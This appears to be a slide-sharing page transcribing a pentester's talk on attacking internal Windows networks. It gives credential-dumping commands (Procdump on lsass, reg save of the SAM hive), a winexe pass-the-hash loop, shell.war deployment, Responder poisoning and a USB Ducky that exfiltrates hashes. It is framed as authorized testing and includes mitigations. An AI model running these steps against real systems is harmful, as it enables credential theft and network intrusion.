SWEBOK and Education at FUSE Okinawa 2024
 
A Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of PassageA Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of Passage
 
Energy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina JonuziEnergy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina Jonuzi
 
socradar-q1-2024-aviation-industry-report.pdf
socradar-q1-2024-aviation-industry-report.pdfsocradar-q1-2024-aviation-industry-report.pdf
socradar-q1-2024-aviation-industry-report.pdf
 
Empowering Growth with Best Software Development Company in Noida - Deuglo
Empowering Growth with Best Software  Development Company in Noida - DeugloEmpowering Growth with Best Software  Development Company in Noida - Deuglo
Empowering Growth with Best Software Development Company in Noida - Deuglo
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
 
Launch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in MinutesLaunch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in Minutes
 
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxTop Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
 
APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
 
E-commerce Application Development Company.pdf
E-commerce Application Development Company.pdfE-commerce Application Development Company.pdf
E-commerce Application Development Company.pdf
 

Why internal pen tests are still fun

  • 1. Why Internal Pen-Tests are still FUN !
  • 2. Why other pen-tests suck ! (not hating) • External – Unless your SE’ing someone its pretty boring. (nessus/qualys grepping human thou art l33t) • Web Apps – Unless you get SQLi or file upload or good business logic bugs. (Oh burp scanning/intruder ninja thou art l33t) • Mobile – Fun unlimited but limited by small threat surface
  • 3. Internal Pen-Tests • SHELLS! SHELLS! SHELLS! – Oh beautiful Shellness! • Nothing beats the joy of popping a box ! • If Local Admin get Domain admin – always a new challenge ! • Data – Oh delicious customer data ! • Mad respect from client “More pen-tests…more monnneeyyy” – Hans Michael Varbaek
  • 4. Why we still own Internal Networks • Weak passwords – Welcome1 still works in 2013
  • 5. Why we still own Internal Networks • No patching – MS08-67 still works in 2013
  • 6. Why we still own Internal Networks • No access controls – RDP/SSH anywhere
  • 7. Easy Pwnage • This stuff still works not because your l33t but because your customer is clueless about securing stuff. – Password attacks • SMB bruteforce from list of domain users (null sessions or using compromised host that gave you a domain user cred) • ^ check password policy before going haywire. • SSH, MSSQL etc (sa,sa still works in 2013) • Metasploit auxillary modules / Nmap scripts are your best friend. (you know most of the good ones r8 ?) • Run all of them if you’ve got time. You never know how low the fruit is hanging unless you bend down. • Nessus/Qualys generally are pretty bad at brueforcing stuff. • Use intelligent word lists – mixin company name
  • 8. Easy Pwnage – Not Patching • Any vulnerable software that Qualys/Nessus finds - if metasploit has a module for it = easy win. – Web consoles (I like these – find them all the time!) • Jboss JMX consoles (setup shell.war and invoke) • Tomcat manager (deploy shell.war) – These usually run as SYSTEM on a windows box. • Any file upload from a web app that is internal (Don’t waste time on this, if you do see something interesting have a poke) – GPO cpassword (Group Policy Preference XML) • post/windows/gather/credentials/gpp – de base 64 and then decrypt using MS provided public AES key • Most likely local administrator password (re-used across all hosts that were deployed with GPPs)
  • 9. Easy Pwnage Filebrowser -> when cmd.jsp gets picked up by AV http://www.vonloesch.de/filebrowser.html
  • 13. Why are we doing all this anyway ?? • Get sensitive data and show customer the real risk of allowing “Mr.Evil” to connect to their internal network – Hunting for data : • Local admin -> Domain Admin -> Search for data everywhere (usually databases – unless they're really stupid and store it in unencrypted flat files) Lesson learnt – Some clients don’t even know what data is important to them. - CEO’s Mailbox is a good start
  • 14. Super Secure Customer • Everything is patched • Super random awesomely strong passwords • Apps are secure coded – no SQLi and no file upload • AV everywhere – I mean everywhere • ^ AV cant be turned off unless you provide password • OMG ! – I should quit pen-testing.
  • 15.
  • 16. Responder • Developed by Laurent Gaffié (Trustwave) • LLMNR and NBT-NS poisoning (Google for what this) – If DNS and hosts file fails, tool yells out saying I’ll resolve that for you and then steals your creds ! – DEMO – Hashes can be cracked via John or can be relayed: http://pen-testing.sans.org/blog/pen- testing/2013/04/25/smb-relay-demystified-and-ntlmv2- pwnage-with-python
  • 17. Responder • Tons of other features – Google “responder trustwave” – Does ICMP re-direct (this is effing awesome – but only works for anything older than Vista/2k8) – Abuse WPAD (Another kool feature) – HTTP, FTP module. • Make sure you are on a workstation subnet for maximum hits.
  • 18. OK – THAT DINT WORK ?? • Give up and go home ??
  • 19. I SAY NO ! • Meet the angry, I will pwn you pentester !
  • 20. Get your Ducky on • HID usb thingy that has a small programmable chip. • When user leaves desktop/laptop unlocked run and connect. (or walk if your not that enthusiastic) • Quickly add user, enable rdp, grab password hashes, system info etc and ship to ur ftp server. (whatever privs user has – ducky has) • Easy to write scripts – write, compile with java load onto Ducky. • ^ Way easier than teensy – Although teensy can be used in stealth/SE tactics. Teensy inside mouse, teensy inside keyboard etc.
  • 21. DUCKY DEMO • If it quacks like a duck – it must be a duck • Video
  • 22. SAFE PASSWORD DUMPING • Old school password dumping tools get picked by AV (cain, pwdump etc) • New ones are getting picked up as well (WCE, mimikatz etc) – These two can dump plain- text passwords from memory. • Disable AV ? • What if AV can only be disabled using a password ?
  • 23. SAFE PASSWORD DUMPING • You don’t have to disable AV or trigger it. • Procdump from sysinternals – C:windowstempprocdump.exe -accepteula -ma lsass.exe C:windowstemplsassdump.dmp – Mimikatz can then chew the .dmp file and spit out passwords in clear text.
  • 24. SAFE PASSWORD DUMPING • Some old methods still work and don’t get picked by AV – hashes from hives: • Reg copy (C:>reg.exe save HKLMSAM sam) • Shadow volume copy (good to grab NTDIS) • ^ Ops guy now do check logs for shadow volume copies and so I’d recommend using SAMEX. (http://www.josho.org/blog//blog/2013/03/0 7/samex/)
  • 25. Searching for Domain Admin • So you popped a few boxes - got some hashes • What now ? • If one of those boxes : – had a domain admin logged in – you have his password in plain-text or got his hash -> game over. – had a service running as domain admin – move to process, pop shell -> game over. • Shares the same local administrator password across the network. – Spray the hash and look for boxes with processes running as domain admin.
  • 26. Searching for Domain Admin #!/bin/sh for ip in $(cat ip.txt);do ./winexe -U Administrator%passwordhash //$ip "ipconfig" ./winexe -U Administrator%passwordhash //$ip "tasklist /v" Done • ^ Metasploit module auxiliary/admin/smb/psexec_command also works. Do not use windows/smb/psexec as this uploads an exe to the box and will trigger AV. • Login to box running the domain admin process – dump hash or read from lsass as plain text. • Replay hash or login as domain admin over RDP etc. • Game over. – Pro Stealth tip : Once you get a domain admin shell DO NOT CREATE a new domain admin user. • This will trigger Ops as a lot of organisations are alerted if a new domain administrator is created.
  • 27. Looting • Go after SQL servers – you should have a list of these from your scans • Shares – Yes people still store heaps of confidential stuff unencrypted in shares • Have you guys seen Firefox PTH ? – All ur OWA and sharepoint r belong 2 us ! • Metasploit – post exploitation modules – store loot in MSF DB for grepping later.
  • 28. Firefox PTH • DEMO • https://code.google.com/p/passing-the- hash/downloads/list
  • 29. Mitigations • You cant really stop a determined attacker • There are just way too many ways you could get hacked • Best bet is to detect • Check anomalies – New user creation (DA etc), Local admin logons, AV pickups etc • User education • Google’s new n/w architecture – All zones are untrust (Not a bad idea eh ?) • Obvious old school protections should still apply – Patching, strong passwords, access controls etc
  • 30. Testing “Pro” tips • Don’t leave any accounts you create on customer’s network – delete everything (Finding DA account by pen-tester in last engagement = fail) • Bruteforce wisely – locking out an important service will not go down well with a customer (Bump down threads = increase stealth) • Don’t disable AV – Intelligent Ops are alerted if AV dies • Wipe your VM after every pen-test – A clean slate to work on is so much better • Snapshotting to have all your tools set-up and then reset also works • Script for linux is your best friend • Notes – always good for other eyes trying to read and understand what you did (doesn’t even have to be fancy - Vi or notepad works) • Videos for complex attacks – I’d highly recommend it (mind you this is gonna eat some disk space and sending this to a client might be difficult)
  • 31. Music (Ignore slide if you don’t listen to music) • Messhugah, Lamb of God and Tool - when ur feeling effing awesome and pwning like a baws • Trying really hard for a breakthrough or fighting a problem – Really fast techno or dubstep • When you lose it and wanna break your laptop – Vitamin string quartet (trust me this works)
  • 32. That’s it • Things I want to work on (any help will earn beers and respect): – Write more ducky scripts (hopefully run faster and grab more stuff, reverse shell etc) – Write post exploit modules (which can loot more efficiently) – Setup a Pi that can do all this over 3/4g to be sent to client so I can watch BSG and sip beer. – Hope this helped. Google for anything that I may have not provided a link or explained in detail Blog: http://psychsec.wordpress.com/

Editor's Notes

  1. Windows =< 5.2 Domain members (XP, Windows server 2003 and above) have ICMP Redirect enabled by default. This functionality can be used to remotely add (with no authentication required) a new route for a given host.   So basically, anything older than Windows Vista / Server 2008 is vulnerable. You just send it an ICMP redirect, and shiz gets redirected.